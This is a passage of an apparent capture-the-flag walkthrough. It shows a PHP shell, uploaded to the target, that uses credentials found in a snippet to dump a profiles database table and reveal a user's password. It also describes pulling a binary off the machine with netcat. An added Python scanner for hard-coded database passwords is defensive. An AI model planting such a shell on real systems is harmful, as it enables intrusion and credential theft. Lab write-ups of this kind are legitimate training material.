So I decided to check the snippets, and I found a code snippet that had the database credentials:

Now, all we need is to upload a shell to retrieve the credentials from the database.

First we add a new file and write our shell:

<?php
// Connect with the credentials found in the snippet
$db_connection = pg_connect("host=localhost dbname=profiles user=profiles password=profiles");
// Dump every row of the profiles table
$result = pg_query($db_connection, "SELECT * FROM profiles");
$resultArr = pg_fetch_all($result);
print_r($resultArr);
?>

And merge it:

All we need now is to curl our shell to get the creds for the user.

The password looks base64-encoded, but the decoded value didn’t work, so I tried using it as is and it worked just fine.

We got the user flag.
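The foothold above started from database credentials hard-coded in a snippet. As an added example (not part of the original writeup), here is a check a defender could run over snippets or repository files to flag `pg_connect()` calls that embed a literal password. The function names are hypothetical; the first sample line reuses the connection string shown above, and the other two are constructed.

```python
import re

# Literal argument of pg_connect(); accepts straight or typographic quotes,
# since pasted snippets often carry the latter.
PG_CONNECT = re.compile(r"""pg_connect\s*\(\s*["'“”](.*?)["'“”]\s*\)""", re.S)
# libpq keyword/value pair: value is bare or single-quoted with backslash escapes.
PAIR = re.compile(r"""(\w+)\s*=\s*(?:'((?:\\.|[^'\\])*)'|(\S+))""")


def parse_conninfo(conninfo):
    """Parse a libpq keyword/value connection string into a dict."""
    out = {}
    for key, quoted, bare in PAIR.findall(conninfo):
        out[key] = re.sub(r"\\(.)", r"\1", quoted) if quoted else bare
    return out


def find_hardcoded_pg_credentials(source):
    """Return one finding per pg_connect() call that embeds a literal password."""
    findings = []
    for m in PG_CONNECT.finditer(source):
        params = parse_conninfo(m.group(1))
        password = params.get("password", "")
        # Interpolated PHP variables ($pw, {$cfg['pw']}) are not literal secrets.
        if not password or password.startswith(("$", "{$")):
            continue
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "host": params.get("host"),
            "dbname": params.get("dbname"),
            "user": params.get("user"),
            # Report weakness without ever echoing the secret itself.
            "password_same_as_user": password == params.get("user"),
        })
    return findings


# Line 2 uses the connection string from the writeup; lines 3-4 are constructed.
SAMPLE = '''<?php
$db = pg_connect("host=localhost dbname=profiles user=profiles password=profiles");
$ok = pg_connect("host=db dbname=app user=app password=$dbPass");
$q  = pg_connect("host=db dbname=app user=svc password='s3 cr\\'et'");
'''

if __name__ == "__main__":
    for finding in find_hardcoded_pg_credentials(SAMPLE):
        print(finding)
```

Findings deliberately omit the password value, so the scanner's output can be logged or attached to a ticket without spreading the secret further.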

PART TWO: ROOT

After enumerating, the only suspicious file is RemoteConnection.exe.

So let’s check it.

Starting by downloading the file from the machine using netcat.